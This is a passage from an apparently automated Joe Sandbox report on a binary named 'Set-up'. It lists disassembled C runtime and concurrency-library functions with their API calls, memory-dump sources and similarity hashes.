                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::$atol
                                                                                              • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                              • API String ID: 2083219425-3945972591
                                                                                              • Opcode ID: 4e0ce52d3163c6dae12072eeb9d1ce9617d8a31ef9a96b5d0634e7aa0a9fa147
                                                                                              • Instruction ID: a39b21030f8df85b5e11d48665ade3361afedfcb4df721b8df118670b3a8335c
                                                                                              • Opcode Fuzzy Hash: 4e0ce52d3163c6dae12072eeb9d1ce9617d8a31ef9a96b5d0634e7aa0a9fa147
                                                                                              • Instruction Fuzzy Hash: 387195719842D8AADB10DBB8EC85FED7778EB15748F50049FE15997080EF7C9A44CB11
                                                                                              Function 6BB768DC Relevance: 28.8, APIs: 19, Instructions: 273COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,000000FF,00000024), ref: 6BB76905
                                                                                              • _get_daylight.MSVCR100(?), ref: 6BB76941
                                                                                              • _get_dstbias.MSVCR100(?), ref: 6BB76953
                                                                                              • _get_timezone.MSVCR100(?), ref: 6BB76965
                                                                                              • _gmtime64_s.MSVCR100(?,?), ref: 6BB76999
                                                                                              • _errno.MSVCR100 ref: 6BB769BF
                                                                                              • _gmtime64_s.MSVCR100(?,?), ref: 6BB769CB
                                                                                              • _errno.MSVCR100 ref: 6BB89DE1
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB89DEB
                                                                                              • _errno.MSVCR100 ref: 6BB89DF7
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB89E01
                                                                                              • _gmtime64_s.MSVCR100(?,?), ref: 6BB89E3A
                                                                                              • __allrem.LIBCMT ref: 6BB89EA5
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB89EC1
                                                                                              • __allrem.LIBCMT ref: 6BB89ED8
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB89EF6
                                                                                              • __allrem.LIBCMT ref: 6BB89F0D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3568092448-0
                                                                                              • Opcode ID: 67b1acd550eb6eb78ed56f4f5474890e4bb3ff7976e53ab9030ef7ac5ea17b89
                                                                                              • Instruction ID: 96906fca29af2002f4c1ee5437a4778642e1fa20b4e12a10041d1a53a64fd5a4
                                                                                              • Opcode Fuzzy Hash: 67b1acd550eb6eb78ed56f4f5474890e4bb3ff7976e53ab9030ef7ac5ea17b89
                                                                                              • Instruction Fuzzy Hash: 0581E371A007829BEB24AE78CC81B5E77F9DF89728F14453AE465D7681FB7CD9008B50
                                                                                              Function 6BB9BAE2 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 111memorylibraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9BAE9
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000020,6BB9BAB4,00000000,6BC0462C,0000000C,6BBA018B,ECA782CA,?,?), ref: 6BB9BB19
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6BB9BB58
                                                                                              • TlsAlloc.KERNEL32 ref: 6BB9BB62
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BB70
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BB88
                                                                                              • _CxxThrowException.MSVCR100(6BB6BD3C,6BB6BDD8,?,00000001), ref: 6BB9BB96
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,FlushProcessWriteBuffers), ref: 6BB9BBA9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BBB0
                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 6BB9BBE3
                                                                                              • std::exception::exception.LIBCMT(?,00000001), ref: 6BB9BC03
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BB9BC30
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BB9BC4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocCountCriticalInitializeSectionSpin$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionH_prolog3HandleLastModuleProcThrowVirtualstd::exception::exception
                                                                                              • String ID: FlushProcessWriteBuffers$bad allocation$kernel32.dll
                                                                                              • API String ID: 2685218194-103648123
                                                                                              • Opcode ID: 01cc62c17f1e4e4753571c6457fe2696e4211796152a9b1ebae7cce38ca64e3e
                                                                                              • Instruction ID: a69c543e1425bffa508c3719b2428dc6789c514746a5bd0710a9b1b6b0be6ae1
                                                                                              • Opcode Fuzzy Hash: 01cc62c17f1e4e4753571c6457fe2696e4211796152a9b1ebae7cce38ca64e3e
                                                                                              • Instruction Fuzzy Hash: 654179B19016A6EFCB209F24C885A9EBFB8FF0A750F04811AF114D7680D7B9A550CFE0
                                                                                              Function 6BB97862 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 247timeCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE78), ref: 6BB978C7
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              • std::exception::exception.LIBCMT ref: 6BB97901
                                                                                              • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(00000001,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9791C
                                                                                              • std::exception::exception.LIBCMT ref: 6BB978B0
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • std::exception::exception.LIBCMT ref: 6BB97956
                                                                                              • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB979BF
                                                                                                • Part of subcall function 6BB9B030: __EH_prolog3.LIBCMT ref: 6BB9B037
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB97A30
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB97A85
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(00000002,6BB97DE5,ECA782CA,000000FF,00000000,00000020), ref: 6BB97AEE
                                                                                              • CreateTimerQueueTimer.KERNEL32(ECA782DA,00000000,6BB97DE5,ECA782CA,000000FF,00000000,00000020), ref: 6BB97AF9
                                                                                              • std::exception::exception.LIBCMT(?,00000001), ref: 6BB97B15
                                                                                              • ?Block@Context@Concurrency@@SAXXZ.MSVCR100 ref: 6BB97B37
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@Exception$??0scoped_lock@critical_section@?wait@event@Block@Context@Copy_strCreateH_prolog3QueueQueue@details@RaiseSharedThrowV12@@std::exception::_
                                                                                              • String ID: bad allocation$pEvents
                                                                                              • API String ID: 3019020058-4135266256
                                                                                              • Opcode ID: fa5a8cc6033b45e211a71aabb02293c2cf44d848317549f95b3f8009e50fbe43
                                                                                              • Instruction ID: e19dcf9b6249b0ad7228c1dac4726b4908acb607131b08e6066b8bf8b17e6eb2
                                                                                              • Opcode Fuzzy Hash: fa5a8cc6033b45e211a71aabb02293c2cf44d848317549f95b3f8009e50fbe43
                                                                                              • Instruction Fuzzy Hash: FFA17B71508281DFC720EF26E881B9EB7E4FF86714F104A7DE4A587290D7B8E945CB92
                                                                                              Function 6BB9C337 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 224COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C371
                                                                                              • _memset.LIBCMT(00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C37D
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C394
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C3B2
                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C3DA
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB9C3E1
                                                                                              • _memset.LIBCMT(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C3FD
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C41D
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C468
                                                                                              • _memset.LIBCMT(00000000,00000000,6BB95C86,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C479
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,6BB95C86,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C490
                                                                                              • free.MSVCR100(?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C5A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$Process$AffinityCurrentMaskfree
                                                                                              • String ID: $$$
                                                                                              • API String ID: 3179535153-233714265
                                                                                              • Opcode ID: 5fe5189ccbe0e0e4999b292724b51c2531576de2ab803fed8026199a09318e1a
                                                                                              • Instruction ID: 1125f299d0f9cf5e999546687101aba5689f5cc4bc2cbd702cc128f3aded43f3
                                                                                              • Opcode Fuzzy Hash: 5fe5189ccbe0e0e4999b292724b51c2531576de2ab803fed8026199a09318e1a
                                                                                              • Instruction Fuzzy Hash: 2981DD70A01684EFDB08DF68D592869BBF4FB0A30074194AFE906DBA40D775EE51DF90
                                                                                              Function 6BB9BD35 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadGroupAffinity,0000FFFF,?,00000000,?,?,?,?,?,?,?,6BB9C2D2), ref: 6BB9BD51
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BD5A
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadGroupAffinity,?,?,?,?,?,?,?,6BB9C2D2), ref: 6BB9BD65
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BD68
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx), ref: 6BB9BD96
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BD99
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BD9F
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BDB7
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BDC5
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BDDD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
                                                                                              • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                              • API String ID: 1483908321-465693683
                                                                                              • Opcode ID: ecc3aa859a7a912f588cf54daa89e9b6c4c87d5fa19ae0e393e4e8fe8a28de99
                                                                                              • Instruction ID: aba0c621b89a755f022cb80ef65e800f6b1dfe414638e112c047f67eda9417e5
                                                                                              • Opcode Fuzzy Hash: ecc3aa859a7a912f588cf54daa89e9b6c4c87d5fa19ae0e393e4e8fe8a28de99
                                                                                              • Instruction Fuzzy Hash: FB119E72904289ABDF24BFB5ED45AAF3BBCEF46650B05047AE501D3140DB3DDA01DBA0
                                                                                              Function 6BB658A9 Relevance: 24.2, APIs: 16, Instructions: 234stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___crtGetStringTypeA.LIBCMT ref: 6BB657BE
                                                                                              • memcmp.MSVCR100(?,000000FE), ref: 6BB6587C
                                                                                              • _getptd.MSVCR100(00000001,00000000), ref: 6BB658D1
                                                                                              • __expandlocale.LIBCMT ref: 6BB658F9
                                                                                                • Part of subcall function 6BB64CF9: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6BB64D2F
                                                                                                • Part of subcall function 6BB64CF9: strcpy_s.MSVCR100(00000000,00000000,6BB64DD8,00000000,00000000,00000005), ref: 6BB64D9D
                                                                                              • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6BB65918
                                                                                              • _strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 6BB6592E
                                                                                              • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6BB6593D
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB6598B
                                                                                              • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB659B4
                                                                                              • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB659EE
                                                                                              • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB65A1A
                                                                                              • InterlockedDecrement.KERNEL32(00000000), ref: 6BB65A43
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6BB90C64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__expandlocale__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 986606718-0
                                                                                              • Opcode ID: 5b3ad50583c6e51cdca8811eabc3e8b5937c701d379ab7ec38bd7407f26486de
                                                                                              • Instruction ID: 2329931387941ae65e20ba436cab9f0db1351c720da17b606fb910734b22f6e8
                                                                                              • Opcode Fuzzy Hash: 5b3ad50583c6e51cdca8811eabc3e8b5937c701d379ab7ec38bd7407f26486de
                                                                                              • Instruction Fuzzy Hash: 5CA10671A002599FDB25CF28C891BE9B7B5FF49344F1040AAEA1DE7251EB35AE90CF50
                                                                                              Function 6BB7373E Relevance: 24.2, APIs: 16, Instructions: 198processsynchronizationCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,00000000,00000044), ref: 6BB73786
                                                                                              • _calloc_crt.MSVCR100(?,00000001), ref: 6BB737E4
                                                                                              • __doserrno.MSVCR100 ref: 6BB7384A
                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 6BB7386E
                                                                                              • GetLastError.KERNEL32 ref: 6BB73876
                                                                                              • free.MSVCR100(?), ref: 6BB73881
                                                                                                • Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BB738A9
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 6BB738B6
                                                                                              • CloseHandle.KERNEL32(?), ref: 6BB738C2
                                                                                              • CloseHandle.KERNEL32(?), ref: 6BB738C7
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB882FB
                                                                                              • _exit.MSVCR100(00000000), ref: 6BB88304
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFreeHeapLastObjectSingleWait__doserrno__dosmaperr_calloc_crt_exit_memsetfree
                                                                                              • String ID:
                                                                                              • API String ID: 2263466040-0
                                                                                              • Opcode ID: f50e3cd9950363e20095cc92255f257aee512bbe74eb1937f01468e5204c5754
                                                                                              • Instruction ID: 78710e172279d2cbd465a9bff26c9687908a0d81622e5f17ca9c789928937815
                                                                                              • Opcode Fuzzy Hash: f50e3cd9950363e20095cc92255f257aee512bbe74eb1937f01468e5204c5754
                                                                                              • Instruction Fuzzy Hash: D2610172D04299AFDF31AFA8CC8199DBBB5EF06314F1541B6E121AB2A0D739CD42CB51
                                                                                              Function 6BB62891 Relevance: 24.2, APIs: 16, Instructions: 165COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno$__fassignisleadbyte
                                                                                              • String ID:
                                                                                              • API String ID: 3459433188-0
                                                                                              • Opcode ID: d32a098543380e4125f7640c6016e8c7f877f801fa4a0d74297e3607b72ced5e
                                                                                              • Instruction ID: 0bc1eca45d380a4f249f0e6a45cedc844ccbfb629a7ff49a229f6853f7187655
                                                                                              • Opcode Fuzzy Hash: d32a098543380e4125f7640c6016e8c7f877f801fa4a0d74297e3607b72ced5e
                                                                                              • Instruction Fuzzy Hash: 6D512572404AD09EC7259F38D841A6E3BB49F037B8724065EE5B58B1D1FB3CDE468B94
                                                                                              Function 6BB9FC51 Relevance: 24.1, APIs: 16, Instructions: 111memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9FC58
                                                                                              • ??0SchedulerPolicy@Concurrency@@QAE@ABV01@@Z.MSVCR100(?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004,6BBA0408,6BC04628,0000000C,6BBA0342), ref: 6BB9FC71
                                                                                                • Part of subcall function 6BBA20FC: ??2@YAPAXI@Z.MSVCR100(00000024,00000000,?,6BB9FC76,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA2106
                                                                                                • Part of subcall function 6BBA20FC: memcpy.MSVCR100(00000000,?,00000024,00000024,00000000,?,6BB9FC76,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA2115
                                                                                                • Part of subcall function 6BBA1D1A: ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA1D5E
                                                                                                • Part of subcall function 6BBA1D1A: _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA1D6E
                                                                                                • Part of subcall function 6BBA1D1A: ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?), ref: 6BBA1D75
                                                                                                • Part of subcall function 6BBA1D1A: ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BBA1DA3
                                                                                                • Part of subcall function 6BBA1D1A: InitializeSListHead.KERNEL32(?), ref: 6BBA1DB8
                                                                                                • Part of subcall function 6BBA1D1A: InitializeSListHead.KERNEL32(?), ref: 6BBA1DBE
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004,6BBA0408,6BC04628,0000000C), ref: 6BB9FCA1
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD43
                                                                                              • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD68
                                                                                              • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD71
                                                                                              • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD7A
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD80
                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FD8D
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000007,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FD9B
                                                                                                • Part of subcall function 6BB9B834: __EH_prolog3.LIBCMT ref: 6BB9B83B
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000007,00000004,00000000), ref: 6BB9FDAF
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000002,00000007,00000004,00000000), ref: 6BB9FDCC
                                                                                              • TlsAlloc.KERNEL32(00000002,00000002,00000007,00000004,00000000), ref: 6BB9FDD7
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F,00000000), ref: 6BB9FDE5
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FDFD
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FE0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
